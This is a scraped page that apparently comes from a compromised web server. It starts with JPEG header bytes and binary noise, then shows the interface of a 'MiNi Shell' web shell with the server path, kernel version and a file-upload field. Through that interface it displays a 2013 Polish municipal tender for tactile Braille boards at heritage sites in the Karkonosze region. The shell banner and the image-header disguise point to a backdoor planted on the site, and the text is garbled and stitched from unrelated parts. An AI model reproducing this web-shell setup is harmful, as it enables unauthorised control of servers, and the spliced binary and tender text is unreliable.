JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130321/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20130321/113332-N-2013.html

<p class="kh_header"><b>Świeradów-Zdrój: Wykonanie, dostawę oraz montaż tablic dla osób z upośledzoną funkcją wzroku dla  projektu partnerskiego pn.: ZOBACZYĆ KRAJOBRAZ - DOTKNĄĆ PRZESZŁOŚĆ - wykorzystanie potencjału kultury i dziedzictwa przeszłości na terenie Subregionu Karkonosze i Góry Izerskie</b><br>
<b>Numer ogłoszenia: 113332 - 2013; data zamieszczenia: 21.03.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Miejska Świeradów-Zdrój , ul. 11-go Listopada 35, 59-850 Świeradów-Zdrój, woj. dolnośląskie, tel. 075 7816471, faks 075 7816585.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.swieradowzdroj.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Wykonanie, dostawę oraz montaż tablic dla osób z upośledzoną funkcją wzroku dla  projektu partnerskiego pn.: ZOBACZYĆ KRAJOBRAZ - DOTKNĄĆ PRZESZŁOŚĆ - wykorzystanie potencjału kultury i dziedzictwa przeszłości na terenie Subregionu Karkonosze i Góry Izerskie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> W ramach zamówienia przewidziane jest :
1. wykonanie 5 szt. tablic panoramicznych wraz z panelami dla osób z ograniczoną funkcją wzroku i 8 szt. tablic informacyjnych z opisami miejsc i obiektów, przystosowanych dla osób z upośledzoną funkcją wzroku, poprzez zastosowanie wyczuwalnych palcami zarysów obiektów oraz informacji w alfabecie Braillea
2. dostawa wykonanych tablic wraz z konstrukcjami montażowymi wchodzącymi w zakres zamówienia 
3. montaż tablic w następujących  obiektach zabytkowych, usytuowanych w poszczególnych miastach partnerskich, tj.:
a. Młyn Wodny w Świeradowie-Zdroju - obiekt wpisany jest do rejestru zabytków decyzja nr 339.1256.J z dnia 28.03.1996 r.,
b. Wieża Zamkowa w Jeleniej Górze - obiekt wpisany jest do rejestru zabytków decyzja nr 614 z dnia 28.08.1959 r.,
c. Wodociągowa Wieża Ciśnień w Mirsku - obiekt wpisany jest do rejestru zabytków decyzja A.1254 z dnia 08.06.2009 r.,
d. Budynek Urzędu Miejskiego w Kowarach - obiekt wpisany jest do rejestru zabytków decyzja nr 9.A.00 z dnia 01.03.2000 r.,
e. Wieża dawnego Kościoła Katolickiego w Radomierzu - obiekt wpisany jest do rejestru zabytków decyzja nr A.915.650.J z dnia 04.08.1980 r.,
cmentarz w Radomierzu - obiekt wpisany jest do rejestru zabytków decyzja nr A.916.1108.J z dnia 07.08.1992 r.
Zamawiający posiada decyzje  pozwolenia na prowadzenie prac i robót przy zabytku.

1. Gmina Miejska Świeradów-Zdrój 
a) tablica panoramiczna - 1 szt. - o wymiarach 100cmx140cm
b) tablica informacyjna - 1 szt. - o wymiarach 100cmx60cm
2. Gmina Janowice Wielkie 
             a) tablica panoramiczna - 1 szt. - o wymiarach 180cmx120cm
             b) tablica informacyjna - 1 szt. - o wymiarach 180cmx22cm
3. Miasto Jelenia Góra 
a) tablica panoramiczna - 1 szt. - o wymiarach 140cmx100cm
b) tablica informacyjna - 3 szt. - o wymiarach 120cmx20cm
4. Gmina Miejska Kowary 
a) tablica panoramiczna - 1 szt. - o wymiarach 100cmx140cm
b) tablica informacyjna - 1 szt. - o wymiarach 16cmx13cmx23cm
5. Gmina Mirsk 
a) tablica panoramiczna - 1 szt. - o wymiarach 180cmx120cm
b) tablica informacyjna - 2 szt. - o wymiarach 100cmx40cm

Tablice panoramiczne:
Należy wykonać techniką druku UV (w odbiciu lustrzanym z poddrukiem koloru białego w rozdzielczości min. 1440 DPI) na spodniej stronie pleksi (6 mm) bezbarwnej z dodatkowym wzmocnieniem uzyskanym poprzez połączenie blach aluminiowych z wewnętrznym rdzeniem polietylenowym. Cała tablica o łącznej grubości - 9 mm. Na tablicach należy umieścić informacje wg projektu planszy (poszczególne projekty plansz tablic panoramicznych w załączeniu), tj.: informacje na temat obiektu, zdjęcia, ryciny, opis po polsku oraz po angielsku, niemiecku i czesku, dodatkowo krótka informacja dotycząca projektów partnerskich oraz logo Unii Europejskiej i herby miast partnerskich. Montaż tablic za pomocą dystansów ze stali nierdzewnej wg dokumentacji projektowej. Ponadto w dwóch przypadkach (Mirsk i Janowice Wielkie) należy wziąć pod uwagę, przy określaniu ceny ofertowej, konieczność wykonania drewnianych elementów konstrukcyjnych, na których to zamontowane mają być przedmiotowe tablice (projekt konstrukcji wg dokumentacji projektowej). Minimalny okres rękojmi - 5 lat od daty odbioru.
Panele do tablic panoramicznych dla osób niepełnosprawnych z upośledzoną funkcją wzroku:
a) Świeradów-Zdrój (50cmx30cm) - 1 szt. - panel z opisem w alfabecie Braillea wraz zarysem budynku młyna wodnego, a także informacje o projekcie partnerskim -  projekt panela zgodny z załączoną dokumentacją projektową,
b) Jelenia Góra (50cmx30cm) - 1 szt. - panel przedstawia zarys wieży zamkowej oraz informacje o niej w alfabecie Braillea, a także informacje o projekcie partnerskim -  projekt panela zgodny z załączoną dokumentacją projektową,
c) Mirsk (50cmx30cm) - 1 szt. -panel z opisem w języku Braillea wraz z zarysem obiektu przedstawia wieżę wodna, a także informacje o projekcie partnerskim -  projekt panela zgodny z załączoną dokumentacją projektową,
d) Kowary (33cmx15cm) - 1 szt. - panel zawiera opis Ratusza w alfabecie Braillea oraz informacje o projekcie partnerskim -  projekt panela zgodny z załączoną dokumentacją projektową,
e) Janowice Wielkie (50cmx30cm) - 1 szt. - panel z opisem w języku Braillea wraz z zarysem obiektu przedstawia wieżę widokową, oraz informacja o projekcie partnerskim -  projekt panela zgodny z załączoną dokumentacją projektową.
(pierwszy wymiar oznacza szerokość tablicy, drugi jej wysokość)

Panele należy wykonać z płyty mosiężnej o grubości 5mm z frezowaniem całej
powierzchni (poza widocznymi liniami) wysokości 2mm (2+3=5 mm grubość
płyty). Ważne aby linie i punkty nie były wklęsłe lecz wypukłe, tak
aby były wyczuwalne przez osobę niedowidzącą.
Należy przyjąć:
- grubość linii głównych, np. linia horyzontu - 5 mm,
- grubość linii uzupełniających, np. zarys zabudowy - 3 mm,
- grubość linii pomocniczych (odnośniki) - 1 mm,
- punkt Braillea - wypustek na 2 mm,
Stelaż metalowy wykonać z kształtowników, profili lub kątowników
z blachy nierdzewnej zgodnie z projektem. Montaż również wg załączonej dokumentacji projektowej.  Okres rękojmi - 5 lat od daty odbioru.
Tablice informacyjne:
a) Świeradów-Zdrój- tablica o wymiarach (100cm x 60cm) - 1 szt. na tablicy przedstawiono schemat działania koła wodnego, wraz z jego opisem, również w alfabecie Braillea  - projekt tablicy zgodny z załączoną dokumentacją projektową,
b) Jelenia Góra - tablica o wymiarach (120cm x 20cm) - 3 szt. - tablica przedstawia zarys horyzontu oraz szczyty i ważne obiekty
w mieście, dzięki czemu będą one wyczuwalne przez, osoby niepełnosprawne z ograniczoną funkcją wzroku, a dodatkowy opis pozwoli na przeczytanie informacji w alfabecie Brailea - projekt tablicy zgodny z załączoną dokumentacją projektową,
c) Mirsk - tablica informacyjna  (100cm x 40cm) - 2 szt. - tablica przedstawia zarys horyzontu oraz szczyty i ważne obiekty, wyczuwalne przez osoby niepełnosprawne z ograniczoną funkcją wzroku a dodatkowy opis pozwoli na przeczytanie informacji w alfabecie Brailea - projekt tablicy zgodny z załączoną dokumentacją projektową,
(pierwszy wymiar określa szerokość tablicy, drugi jej wysokość)
d) Kowary - makieta ratusza (16cm x 13cm x 23cm) - 1 szt. - makieta budynku Ratusza w skali 1:75. Tablica informacyjna przestrzenna wykonana z
metalu/tworzywa sztucznego, ma służyć jako obiekt, który osoby niepełnosprawne z ograniczoną funkcją wzroku będą mogły dotknąć i wyobrazić sobie jak dany budynek wygląda. Na elewacjach budynku zaznaczone będą ważne podziały, płaskorzeźby okna drzwi, portale itp. - projekt tablicy zgodny z załączoną dokumentacją projektową. Całość umieszczona na postumencie - stoliku (wykonanym z granitu szarego ) o grubości ścianki 5 cm. Stelaż metalowy wykona z kształtowników, profili lub kątowników z blachy nierdzewnej zgodnie z załączonym projektem.
e) Janowice Wielkie (180cm x 22cm) - 1 szt. - zarys horyzontu oraz szczyty i ważne obiekty będą wyczuwalne przez osoby niepełnosprawne z ograniczoną funkcją wzroku, a dodatkowy opis pozwoli na przeczytanie informacji w alfabecie Brailea - projekt tablicy zgodny z załączoną dokumentacją projektową,
(pierwszy wymiar oznacza szerokość tablicy, drugi jej wysokość)

Tablice wykonane są z płyty mosiężnej o grubości 5 mm z frezowaniem
całej powierzchni (poza widocznymi liniami) o wysokości 2 mm (2+3=5 mm
grubość płyty). Ważne aby linie i punkty nie były wklęsłe lecz wypukłe, tak aby były wyczuwalne przez osobę niedowidzącą.
Należy przyjąć:
- grubość linii głównych, np. linia horyzontu - 5 mm,
- grubość linii uzupełniających, np. zarys zabudowy - 3 mm,
- grubość linii pomocniczych (odnośniki) - 1 mm,
- punkt Braillea - wypustek na 2 mm,
Stelaż metalowy wykona z kształtowników, profili lub kątowników z blachy nierdzewnej zgodnie z projektem. Montaż tablic również wg dokumentacji projektowej. Minimalny okres rękojmi - 5 lat od daty odbioru.

Dokonuje się  następujących zmian w  dokumentacji projektowej tablic  :
a) każdorazowo  hasła  o  treści:
Fundusze Europejskie dla rozwoju  Dolnego Śląska
 zmienia się każdorazowo na hasła  o  treści:
 Fundusze Europejskie - dla  rozwoju  Dolnego Śląska,
b) każdorazowo nazwę Miasto Kowary zastępuje się każdorazowo nazwą Gmina Miejska Kowary.
Wykonawca zobowiązany będzie do przedłożenia Zamawiającemu do  akceptacji w terminie do 5 dni od dnia zawarcia niniejszej umowy projektu graficznego tablic w  formacie pdf do  akceptacji, w rozdzielczości  umożliwiającej jego poprawną weryfikację, jednaka nie mniejszej  niż 100 dpi., w szczególności do przedłożenia:
-projektu graficznego tablic  wraz z  pisemną akceptacją  treści  tablicy w alfabecie Braille`a,  dokonaną przez Polski Związek Niewidomych,
-projektu  graficznego  tablic wraz z pisemną akceptacją  treści  tablicy w języku angielskim, niemieckim,czeskim  dokonaną przez tłumaczy przysięgłych.
W terminie do 5 dni od przedłożenia projektu graficznego, Zamawiający może wnieść do niej swoje uwagi, które Wykonawca winien uwzględnić lub odpowiednio się do nich ustosunkować. Zatwierdzony przez Zamawiającego projekt graficzny  będzie podstawą do realizacji zamówienia..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 45.23.30.00-6.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 20.05.2013.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Przystępując do niniejszego postępowania każdy Wykonawca zobowiązany jest wnieść wadium  w następującej  wysokości: 1.200,00 zł (słownie złotych: jeden tysiąc dwieście  00/100)</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności. W celu potwierdzenia, że Wykonawca spełnia warunek nr 1 należy przedłożyć Oświadczenie o spełnieniu warunków określonych w art. 22 ust. 1 ustawy Prawo Zamówień Publicznych Wykonawca spełnia warunek nr 1 jeżeli przedłoży oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 2 do SIWZ</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności na podstawie art. 22 ust. 1 - dysponuje osobami zdolnymi do wykonania zamówienia tj. osobami posiadającymi następujące kwalifikacje i uprawnienia łącznie z członkostwem i wymaganym ubezpieczeniem od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa: a) uprawnienia budowlane do kierowania robotami budowlanymi w specjalności konstrukcyjno-budowlanej  w ograniczonym zakresie  wraz z uprawnieniami  do kierowania pracami konserwatorskimi przy zabytkach nieruchomych, zgodnie z Rozporządzeniem Ministra Kultury z dnia 9 czerwca 2004r. w sprawie prowadzenia prac konserwatorskich, restauratorskich, robót budowlanych, badań konserwatorskich i architektonicznych, a także innych działań przy zabytku wpisanym do rejestru zabytków oraz badań archeologicznych i poszukiwań ukrytych lub porzuconych zabytków ruchomych . Dokumenty potwierdzającego spełnianie warunku: a) Wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. W przypadku, gdy Wykonawca polega na zasobach osobowych innych podmiotów, dołączy dokumenty potwierdzające, że Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów. b) oświadczenie, że osoby które będą uczestniczyć w wykonywaniu zamówienia posiadają członkostwo i wymagane ubezpieczenie od odpowiedzialności cywilnej z Okręgowej Izby Inżynierów Budownictwa. Od osób o których mowa w pkt. b) będących obywatelami państw członkowskich Unii Europejskiej, Konfederacji Szwajcarskiej lub państw członkowskich Europejskiego Porozumienia o Wolnym Handlu (EFTA) - stron umowy o Europejskim Obszarze Gospodarczym, którzy nabyli prawo do wykonywania określonych zawodów regulowanych lub określonych działalności, jeżeli te kwalifikacje zostały uznane na zasadach przewidzianych w ustawie z dnia 18 marca 2008 r. o zasadach uznawania kwalifikacji zawodowych nabytych w państwach członkowskich Unii Europejskiej (Dz. U. Nr 63 poz. 394), nie wymaga się przynależności do samorządu zawodowego wynikającej z art. 12 ust. 7 ustawy Prawo budowlane lecz spełnienia art. 12a tejże ustawy. Opis sposobu dokonywania oceny spełniania warunków : Wykonawca spełni warunek nr 6 jeżeli przedłoży wykaz o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 6 do SIWZ i przedłoży oświadczenie o którym mowa w kol. III zgodne ze wzorem stanowiącym załącznik nr 7 do SIWZ. W przypadku, gdy Wykonawca polega na zasobach osobowych innych podmiotów, dołączy dokumenty potwierdzające, że Wykonawca będzie dysponował zasobami innych podmiotów w stopniu niezbędnym do należytego wykonania zamówienia oraz oceny czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do tych zasobów, które mogą być w szczególności przedłożone zgodnie ze wzorem stanowiącym załącznik nr 5 do SIWZ</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków, lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>INFORMACJA UZUPEŁNIAJĄCA: Jeżeli w kraju zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibie lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w pkt. III.4.3.1, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibie lub miejsce zamieszkania - wystawione z odpowiednia data wymagana dla tych dokumentów. W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, oświadczenie o spełnianiu każdego z warunków, o których mowa w art. 22 ust. 1 składa co najmniej jeden z tych wykonawców w imieniu swoim i pozostałych wykonawców. W przypadku oferty składanej przez wykonawców ubiegających się wspólnie o udzielenie zamówienia publicznego, dokumenty potwierdzające, że wykonawca nie podlega wykluczeniu składa każdy z wykonawców oddzielnie</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>1. W przypadku wystąpienia jednego z następujących zdarzeń: a) uniemożliwiających lub utrudniających prawidłowe wykonywanie zamówienia lub wykonanie zamówienia w terminie, których Wykonawca lub Zamawiający nie mogli przewidzieć, b) które mogą negatywnie wpłynąć na trwałość przedmiotu umowy, c) narazić Zamawiającego na szkodę, dopuszcza się zmiany w umowie. 2. Zakres dopuszczalnych zmian: a) konieczności zmiany terminu realizacji umowy na roboty budowlane, w przypadku wystąpienia tzw. siły wyższej, tj. przez siłę wyższą należy rozumieć zdarzenie bądź połączenie zdarzeń obiektywnie niezależnych od Wykonawcy i Zamawiającego, które zasadniczo i istotnie utrudniają wykonywanie części lub całości zobowiązań wynikających z umowy, których Wykonawca i Zamawiający nie mogli przewidzieć i którym nie mogli zapobiec, ani ich przezwyciężyć i im przeciwdziałać poprzez działanie z należytą starannością ogólnie przewidzianą dla stosunków zobowiązaniowych. Wykonawca jest zobowiązany niezwłocznie poinformować w formie pisemnej Zamawiającego o fakcie wystąpienia siły wyższej, udowodnić te okoliczności poprzez przedstawienie dokumentacji potwierdzającej wystąpienie zdarzeń mających cechy siły wyższej oraz wskazać zakres i wpływ, jakie zdarzenie to miało na przebieg realizacji zamówienia, b) wystąpienia w trakcie wykonywania zamówienia odkrycia co którego istnieje przypuszczenie, iż jest ono związane z zabytkiem lub uzasadnione będzie zawiadomienie konserwatora zabytków w celu dokonania oględzin odkrycia lub w celu zorganizowania badania archeologicznego. c) wystąpienia warunków geotechnicznych lub geologicznych, odmiennych nie przewidzianych wcześniej badaniach, d) działań i zaniechań organów władzy publicznej lub instytucji polskich, w tym zmian urzędowych interpretacji przepisów dotyczących wykonywania lub finansowania zamówienia. e) przerw w wykonywaniu zamówienia wynikających z innych zdarzeń niemożliwych do przewidzenia w chwili zawarcia umowy. f) zmiana postanowień niniejszej umowy na skutek zmiany powszechnie obowiązującego prawa, z wyłączeniem zmiany stawki VAT. Termin wykonania zamówienia (umowy) ulega wydłużeniu o czas równy trwaniu warunków atmosferycznych utrudniających terminowe lub prawidłowe wykonanie zamówienia, czasu niezbędnego na zawiadomienie konserwatora zabytków w celu dokonania oględzin odkrycia, lub w celu zorganizowania 